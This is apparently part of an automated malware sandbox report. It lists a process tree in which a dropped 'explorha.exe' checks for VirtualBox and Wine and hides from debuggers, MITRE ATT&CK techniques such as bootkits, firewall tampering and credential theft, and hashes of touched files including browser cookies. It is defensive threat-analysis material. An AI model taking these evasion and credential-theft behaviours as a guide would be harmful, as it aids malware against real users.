  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4212 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:1
  2⤵
  PID:5800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:8
  2⤵
  PID:1280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5340 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:8
  2⤵
  PID:5528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:8
  2⤵
  PID:3740

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5260

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5952

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1068 -ip 1068
1⤵
PID:3996

C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
1⤵
PID:2796

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:840

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3048

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2052

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3664

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2444

C:\Users\Admin\AppData\Roaming\cctbhgt
C:\Users\Admin\AppData\Roaming\cctbhgt
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2216

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4188

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3048 -ip 3048
1⤵
PID:5864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2360 -ip 2360
1⤵
PID:2056

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.2MB

MD5
eaaad382f7c37c93b651e4d4497a6e51

SHA1
aa66ec46896817d8bde66c1c44f6d4b923fba7e6

SHA256
d0b9e2648418277b44fe305bc73c74e7c71725e600fabf8b9f096ba95069f03d

SHA512
ad0ea4ac16d2b998fe49f6318a2d61ecad3bd9b9105f308b1b70e067cd8695fbfeb95da8c15a6d57a4c29ed625c094d7f491becb0514a5bd0e34b9236a346f5c

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\CGCFCBAKKFBFIECAEBAEBGCGDG

Filesize
2.5MB

MD5
e1ee73a44aa4a839738e9977342e219b

SHA1
0761f30de02257a69493cd8a7ec8b7eae14b91ad

SHA256
11900602dca2439404d41e6f1b09cea350d5d30bf6aad2f37eaebc4b7e76563e

SHA512
c165cf701b6b21a4b51dd5c78447781a8c8e027f78784e0ffb5bac2b613a01472cce3c4b6ad223db44e9f21281058995eda75a1e4983a4aea83ef13d1e259741

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4709C8C56C75B1F59D3D0B7A9AB68820

Filesize
503B

MD5
c72852ffc448ab8801fc82c6f82db80f

SHA1
ea1c28c8e4d999c120987896957581fb184d0e86

SHA256
fc52e0a3b52280f729375bcd9fecdcd3f0fd2290b504bcc558b685f0d777aab1

SHA512
88718e6ebf7d5721c8b9d204e1a9eeb122de19f378bb0930bef9548250c17cdc9fa98b215e577462a800840960e38d43b5648d90ef191c24142ef1d17609929e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

Filesize
471B

MD5
9f29598c9fbe4548da1b01a25595195b

SHA1
f343f41b536d0cdd8fc96a1befd73518d31c99a8

SHA256
a0b598a0bd5cc8d45c752a3b0163519f98ecabb8405c6efe2c0432eadaf74d8a

SHA512
e102e527a4aacf0d90f301f0e7a1354ede1e65b99165065247d435ac590143822504e3a1ab6f6b4cdc8bdb955817b009e2d0dbecfc71aaa44e3390b4adc9b188

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
27e5637bf134cca0acd6ea90f541e8ac

SHA1
db81c0ed3d05e43afd89139e5c78b4c242b98888

SHA256
b8ca45b08ebe19601c8e7dc53381b7ceaf078dddf9c49b694c1b93d1776e002a

SHA512
fb827814296612b96c8ce42ef3464562ac4329ba0d8f6e3d874fc912e34966466583b4fcef7538338fbdfb296c95ba8cb0cc06c5e9cebcd8aeedf9fd2a88a216

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4709C8C56C75B1F59D3D0B7A9AB68820

Filesize
552B

MD5
c2773dc21b94e8b8cf93ce08356b43b7

SHA1
23c1c6ec50fe5aa3440c0c40a21ac89fdf5af347

SHA256
d202661bb755a430eab07f173c4182adcd64eb3aef0d7d6b9596950d199548e5

SHA512
b7bd39b8be27c9ebe93b49b995dd0c57d5813db20f4d9a83261f13731e834f573a29642aa23afbb0eb07660f93341c8e8c4227fa507a90beb82aeb332dda9393

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

Filesize
400B

MD5
f64001fe70f8f247fbb742373cb3b74a

SHA1
7c0774dca54b7076835b81acfe88f0fc2842dc4f

SHA256
c5c6e98ed994166647b1f65bebcbf4517c3e1b9fba3c27a5d04e532191ac007d

SHA512
163985c10820aac49df59027504d4972cae5507a4540682e82a1eeedcd1b04aa6eadf0e7223a9679cb00d49432e775ba63ea3cf576d16171df3874b954cf8298

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
d98a862745da89fffa1a305d578048b9

SHA1
59c750081af110ad27f4a360bef4ef689b0fa519

SHA256
2d1a2162f435610d5e0dd4650a8e71211f1a25d879a94d11fc06c111c69a23ef

SHA512
d7885a29a75646721b631f736bab26191a0c79f7b32b1e2c7d1cc79507ba80a598d9bb9e967a10cb522d6f8c65c1a8eddfd96d75ccb0914947c09566c7642dec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\585e5ee6-1226-4bb2-8500-f0fadd4dd3e2.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Filesize
20KB

MD5
d5388a8b1d9aaef6b1faafe2d1d9c6e7

SHA1
0d35b769ea32f4206f96d90735aa2a58d9109312

SHA256
87c7d3abb117e75e9d283d198527e5c051784f281f83cce13906b085c5a7a5ba

SHA512
8e171b65851197e57280d3f522fdf516e3ebf2d04e7ed64d053cdae6d8d0ba9bd496c5d2025732ec72e19b93073acb832f5b033ed197f5ce648bc7b5c2446eb6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
70da0060a47ef68ad74009482daeff8a

SHA1
2c72c9aa86b03f868da3d5a2be0132b4db81727c

SHA256
f591cfd7de40572d50aaca26cb990d5bd331d2dfd86dc71c54cf74e4c9b4c976

SHA512
c63aaa6502dd8f6b92be9efcbaaf330da5e44133bd3c31ae52a77efa966e1e25397ed14eab63e5a30a6cf59591b5038fcdc38b6af182cc18e1191cb156739e12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
c744db4d1c48aa40bec3e1b159e4f16c

SHA1
017ed004bdb6ae01404a3e9175f4a5ab7b8a8303

SHA256
96b860ac8a6f853dd35a09377e3ca2c055ae5ffeb7deab1f85c00f21ec43fe8f

SHA512
5e56e95eafdcec3f6958a5e0d6ff0dd19edbb6bb0b500b05de8b6a7f96dc98509fcc69f9e154b6baa21b6bdf24da459a92d5bd2b3dee0136f8c8d43a5f837295

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
4f1d0120f6fc594a19a9bc86169d943e

SHA1
0b6f250fc4eb59cc98e150aed0b9f8672c617b80

SHA256
c21df632a37fed65dea93a8aa1eebbc513e2db4f34092ef9190a3901969a7756

SHA512
344731e03eea723609f9d17ac44e67b91115fab63d044a5714389377ecd10b0ccc747da7c9411fc557baf856a7e915a78d4d0891745fec12a5d505f24817522e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
70b920ee224b719b3e8ea3b47ee48a2f

SHA1
5883383148a893f27e8c2c8c23a334f496f31657

SHA256
eca62d910a0a503747feda20a295c54466e47ad5bd24854f2895ebf666c287e1

SHA512
b36aeb0c3b99f304e694e5297f69c9af141a45dd3cf83f59467a881d9f8aa817adfc176985a19bd6eb2ed635884bafc819e5645fb2de6d40c86e95fc91562227

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
b7b494af348982154da8f6e59c24b99c

SHA1
8f5837f05de7df6f4f177bd2b592073619aa770f

SHA256
9c03f5127e5c875ad88975bb86d1beff8dc63da44a9f9390624b38fb9bb829f7

SHA512
ab6db9a1d54a74b2678611e4a45ef70af7f1b42edf8fe7ba4a6dfdc63888db546161d690dab65d9cbb80eee84219b7bb55b5b07ded20ff87b87ff0c89589ad40

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
75f431d1e687b85d9258419ec3ae1f80

SHA1
1141782dcef01f8a16dce7ecf227a583f22fdf67

SHA256
82db7babcaed85c99a0b56dcf23d3440a2932e6351d0a174f1dcc763640ad668

SHA512
dadd66d84e4414c7294905843155306545dbc0ebee4d02c3c2085bbed7c1bfaccac61941d3ac751b27c8b4363219fafea8e84ca41f1975a8b4226d8dac3e9e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
128KB

MD5
b3cd0c950ef3b2ee53da94676db3eddc

SHA1
a463bfba80331a69d901f45ca1ea6eeba8096061

SHA256
aedd01a1cc782c151e59d3af74e861b5c5e02a588a6bd4ce3e9224aed7145696

SHA512
0ce4bb5b5706b9a5f54d0f80c3b1ca802e92107741cdf19738a0c22292e57a16afe9cabe5be1ccf797443be4f301b1fc10c19c1777c0f88a94570f13df943d9f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
128KB

MD5
89ab22704409d502adb65c61e96c61c1

SHA1
bbf82d765ff233408b8584b8416934e6d9ab8c32

SHA256
600efb04732f68d8d799ca6f2beb1944d1408c1f5936976944de4739d9fa1d8f

SHA512
e7d79f03ce21d675818222fc4fd36bd0cf8ddd9357e930915f0d9fb6501ad84c9143e7d361e6ab876e5b02d4f9549a732f90cff363454abc6694d7ef86428190

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
258KB

MD5
c498a0de6ad570a1a8d8648369b6f875

SHA1
57d080b87203490718f6de09ea0e181e89f837d2

SHA256
34560456ec04497602be0a2bf5dad71259769883ac5d543ec81901038be154f2

SHA512
39b0e0f045ff16c0914cd0412ede5ea106026f6f47754b5c986668a9dcbad6b9fe775c55ec5f31e7b5cb4de4a14e4f614e607f5d78b1d9ea93b3a1beca5ecc9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
114KB

MD5
034cfb910a3ead38f60185526b2b0f45

SHA1
135212586dff78591c9f52ba53cee69ebe391cc2

SHA256
3ae402c61b19a75a1c33fa07bb036d816612ffad579abb3693f6ced2ef09bdda

SHA512
e9bb28a8f245b98dbb267a54a8177a846da10016af578c38d855870ed20a08582cedca131218a3ef02b633fabf004515e6f5b4ac6b4a75d5c4e9d4b3d5d7f3d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
117KB

MD5
4e8e42deb3d4868657db5fc91802ca30

SHA1
da99e418049786cd0e126d8ee80111b0ea5549da

SHA256
dd5e51e3ac1b1a98c494388a1de3af39d178ae376920b9150ced7e7ebbebffde

SHA512
996d91e392bd1814bd542c578f4fb8f1c4a64cff4ededada6706113950c2ebba4880d37d4297f5f279feb4c97007894d8aa443bf29a0e531aeaf30fb9fcd54ec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58269e.TMP

Filesize
107KB

MD5
3940d7b92ae0d2aff544c45c506f5bd6

SHA1
04c780060caceac6b8bcc33b87a9166ed34c20c7

SHA256
6315948919b4b48b7820fca3f668752b0797e4d6a15d1343428e3c5e40b65fb0

SHA512
2592fbc439887b0c2eaa12f8da36fb31f07e05d17791e66edf259fee60ee312611fe49512fae0bfbe94b1a0765cef70340705d5f9dfca723de77d3cf859ef0aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
be20a391e8b08bf8ec1fb409dca91074

SHA1
1dc6e472764871cb67771860b1b0d4867668a546

SHA256
8b52cf831aa0ba5e05399a1a13d0c476aa52975926c80a89bc8a6a5edb25f32c

SHA512
ebcbdcd6b97a44844142dd47b6083fbe5eea206dfe738ca008c2e4f7e5e795e77fecf11bd985787a8c2e8dede4a2c0266233fe3ec1db9ea1dc6c6873def4d346

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fqaEFn20tPKtGTDCoMLJ.exe.log

Filesize
42B

MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
279e783b0129b64a8529800a88fbf1ee

SHA1
204c62ec8cef8467e5729cad52adae293178744f

SHA256
3619c3b82a8cbdce37bfd88b66d4fdfcd728a1112b05eb26998bea527d187932

SHA512
32730d9124dd28c196bd4abcfd6a283a04553f3f6b050c057264bc883783d30d6602781137762e66e1f90847724d0e994bddf6e729de11a809f263f139023d3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cbec32729772aa6c576e97df4fef48f5

SHA1
6ec173d5313f27ba1e46ad66c7bbe7c0a9767dba

SHA256
d34331aa91a21e127bbe68f55c4c1898c429d9d43545c3253d317ffb105aa24e

SHA512
425b3638fed70da3bc16bba8b9878de528aca98669203f39473b931f487a614d3f66073b8c3d9bc2211e152b4bbdeceb2777001467954eec491f862912f3c7a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
51KB

MD5
f61f0d4d0f968d5bba39a84c76277e1a

SHA1
aa3693ea140eca418b4b2a30f6a68f6f43b4beb2

SHA256
57147f08949ababe7deef611435ae418475a693e3823769a25c2a39b6ead9ccc

SHA512
6c3bd90f709bcf9151c9ed9ffea55c4f6883e7fda2a4e26bf018c83fe1cfbe4f4aa0db080d6d024070d53b2257472c399c8ac44eefd38b9445640efa85d5c487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
27KB

MD5
93e7c16239dbaa1d7ce242fe773a0950

SHA1
69f8f623b98f7271246e5104e5b0be96666be9cc

SHA256
4c08b630669724d71e5946faa29c85e9f62ca9e5aad1cb9625ffe27fb0f14d32

SHA512
bf660c22bcd64eeb197953ef2a43e31bcf73564e2cf854384bdc1b050a9804581b7cbfbaa8fa24afe3f5621cc43ad72c2c88d9d9dfabf302aa8290c5dbf40c88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
960B

MD5
fd77740f7bab40271003fc1e750d7b34

SHA1
2b0fbd2c62e886b5b4845cbf147d7d940c2cba09

SHA256
29b75a637a4ac544986667b9263aa75b73079585d0c4fb0ef6aa0a3ac0a96ec2

SHA512
6ac383369cbb6dcfec2130fbc6aee622938d236de214059ea8e3e5a42e2af67b7cf4ca372e678acdb95da28150097c7b5b50e843fbfc0c8c112a6b12a7c99048

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b059b48204fb907cd9718f38f0bc244e

SHA1
b4d0b9c77f789bffd8ad696a45c298ea44e5687a

SHA256
3469add8c6c9b2a1e41833ea8d15cb72db1005fb241cac611ab169ebcaf409f2

SHA512
fd8b6ff796cd75a3240f543c18d6fda8aa415c72b731e57f75884e63ccb4cf4ca7495befee47ee9ce77f08f78a550392920325d90453c2d0dd223297a87038cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b0b4126844c69de10c7aa25bfa863cfb

SHA1
c5e469ef59250a9083656af1ea4652c48a7ebab9

SHA256
30f395d75b5882aa1503c42fab22c3b69aaeab57b297bdf9d7f54010eb5db810

SHA512
40be9d6d459aa9889ec928d75bc3aa0401bcbd29a1ac07a3efc47a4e4d0d68f0e1c3f8437b851eee05cb933c7c131688407e7108a4e519bcc56e440f3305e3aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json

Filesize
151B

MD5
bd6b60b18aee6aaeb83b35c68fb48d88

SHA1
9b977a5fbf606d1104894e025e51ac28b56137c3

SHA256
b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

SHA512
3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
bba11e46edb197317b68522523a48e98

SHA1
a92bed030e5efe1929f3542f1f8772e693eeeb99

SHA256
b5c03d63a291b4b14937e6aa05607548d4adc4df120847dd7c9956680cd79df9

SHA512
db7fa4656af6d88050e706395265fbe6ac69522d09fddd8ad82585f6fc29666a5ee847a7f44830d4644d6afb4046935721ed1f5c67dc17f6e5aa0f00968372f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
12a879d17b1e24aedb0af0c573c79cd5

SHA1
8ae5593241d0df48fbb2c26458326a48806515b3

SHA256
7ada6150bfc8dc4883726d72cfa28d457a28e7579da5fcc6fee5bcaa9cb9ddc9

SHA512
8017bf9145a2e84aff5ba71c1797b12369a4018769d917f553910b817509df044b5ca57a7d3543f633ce7fe83c5f37fb364af507a0f20d2c8332841e7a6b9037

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
7c677f2d21302a43f75d0ca29a749eb6

SHA1
6653951ee4ed2100fdd3d963917b01b781c9c56a

SHA256
848f40f32a858dfe8668681e4ea8d955ba5aea8931b6cbe25ac28709ca35b41f

SHA512
7704ea8ec94cb6377cb562015cf447d1381f50b3230cec1ec3726e4163153f37deae5e9e7978123b944bcd41197a5bd7ed04b69325a091fc078a8c78eab375bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
7192a9f673421ffdba8a2a3d4af461f0

SHA1
1da1e00c778e577d3a714ab0eb16723a2ebaedd5

SHA256
9f686c48094c3739acfc38e0b66ae1c6dc5fd941740af16018cd75137c8dc913

SHA512
d9f4abb72b4b13497b9acddcf0caa503650837414b28232de268fa5873c5257e7c3be87f2459d5eab933a8944ce343de02cfc1fbd62b13a886a656c483713274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0a3477110f36ecd4bdf9d5d48267027e

SHA1
2c6f7031e3b5e145ad92d6cb15943d99b4570ce3

SHA256
a451a5a6301b691e32610e5b8b8e4806e3436b77686d80a8d626668e1dda229b

SHA512
f6e20cfbe9e34a20ea0f21a999366215466c14bdeb13e820175800649c898e1ca5bd0fb981bb031047ade154fccf1b1754ab07032df4bb451105c6eef600af98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
574ffe82cda76e00c0c5245cca15a2c6

SHA1
0e253cb7c0691de6866d0b35a5259baae5b95419

SHA256
edb9c7f42e4d699340a935c9e1611c69a0e00c7642532088d23928b03257d97b

SHA512
